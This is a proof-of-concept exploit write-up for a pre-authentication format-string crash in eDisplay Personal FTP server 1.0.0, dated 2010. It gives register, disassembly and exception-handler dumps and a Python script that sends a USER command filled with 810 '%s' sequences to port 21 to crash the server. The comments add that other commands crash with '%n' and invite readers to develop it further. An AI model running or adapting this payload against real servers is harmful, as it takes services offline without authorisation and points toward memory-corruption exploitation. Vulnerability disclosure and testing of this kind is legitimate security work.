# Title: eDisplay Personal FTP server 1.0.0 Pre-Authentication DoS (PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hat's off to dookie2000ca
# Disvovery date: 16/03/2010
# Software link: http://edisplay-personal-ftp-server.software.informer.com/
# Tested on: Windows XP SP3 Professional
# Nod to the Exploit-DB Team

# Vendor informed via email : 17/03/2010

#!/usr/bin/python

#Pre-Authentication crash #1
#I say crash number 1 since there's another instance where it crashes with the USER command.
#Also many post-authentication commands also crash with the same buffer type (%n for example)
#with variant degrees of interesting CPU registry overwrites.
#It will crash if you send it about 40 '%s' really, but I've included my full session of 810 bytes sent.
#As always, if anyone wants to take this further go right ahead. Just be nice and don't forget who found it.

#CONTEXT DUMP
# EIP: 7e4287aa mov dl,[eax]
# EAX: 73736150 (1936941392) -> N/A
# EBX: 0000000a ( 10) -> N/A
# ECX: 73736150 (1936941392) -> N/A
# EDX: 00000000 ( 0) -> N/A
# EDI: 0012c9a6 ( 1231270) -> P(9d%s%s%s%s%s%s%s%s%s%s...%s%s%s%s%s%s%s%s%s%:UBsSHs%:vHEs<;T (stack)
# ESI: 73736151 (1936941393) -> N/A
# EBP: 0012c8e4 ( 1231076) -> P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source, 
#	 and whether this process is started automatically 
#	 or under programmatic control.P(9d%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (stack)
# ESP: 0012c89c ( 1231004) -> 9HwC(J :^:{P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source, and whether this process is started automatically or under programmatic (stack)
# +00: 0139b8d0 ( 20560080) -> PWSOCK32.DLL (heap)
# +04: 77124880 (1997686912) -> N/A
# +08: 000000cd ( 205) -> N/A
# +0c: 00000000 ( 0) -> N/A
# +10: ffffffff (4294967295) -> N/A
# +14: 00000000 ( 0) -> N/A

#disasm around:
#	0x7e428794 push eax
#	0x7e428795 push byte 0x0
#	0x7e428797 push esi
#	0x7e428798 lea eax,[ebp+0x8]
#	0x7e42879b push eax
#	0x7e42879c call [0x7e4114b8]
#	0x7e4287a2 jmp 0x7e428747
#	0x7e4287a4 test eax,eax
#	0x7e4287a6 jz 0x7e42875e
#	0x7e4287a8 jmp 0x7e428747
#	0x7e4287aa mov dl,[eax]
#	0x7e4287ac inc eax
#	0x7e4287ad test dl,dl
#	0x7e4287af jnz 0x7e4287aa
#	0x7e4287b1 sub eax,esi
#	0x7e4287b3 xor esi,esi
#	0x7e4287b5 xor edx,edx
#	0x7e4287b7 cmp [ebp-0x28],edx
#	0x7e4287ba jnl 0x7e443411
#	0x7e4287c0 sub [ebp-0x18],eax
#	0x7e4287c3 cmp esi,edx

#stack unwind:
#	FtpServX.dll:50e0989b
#	FtpServX.dll:50e0a6d8
#	FtpServX.dll:50e09d91
#	USER32.dll:7e418734
#	USER32.dll:7e418816
#	USER32.dll:7e4189cd
#	USER32.dll:7e4196c7
#	MSVBVM60.DLL:7342a6b0
#	MSVBVM60.DLL:7342a627
#	MSVBVM60.DLL:7342a505

#SEH unwind:
#	0012fdf8 -> FtpServX.dll:50e1ceb4 mov eax,0x50e1fcf8
#	0012fe58 -> USER32.dll:7e44048f push ebp
#	0012ffa8 -> USER32.dll:7e44048f push ebp
#	0012ffe0 -> MSVBVM60.DLL:7350bafd push ebp
#	ffffffff -> kernel32.dll:7c839ac0 push ebp


import socket

buffer = ("%s") * 810	# \x25\x73

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER '+buffer+'\r\n')
s.recv(1024)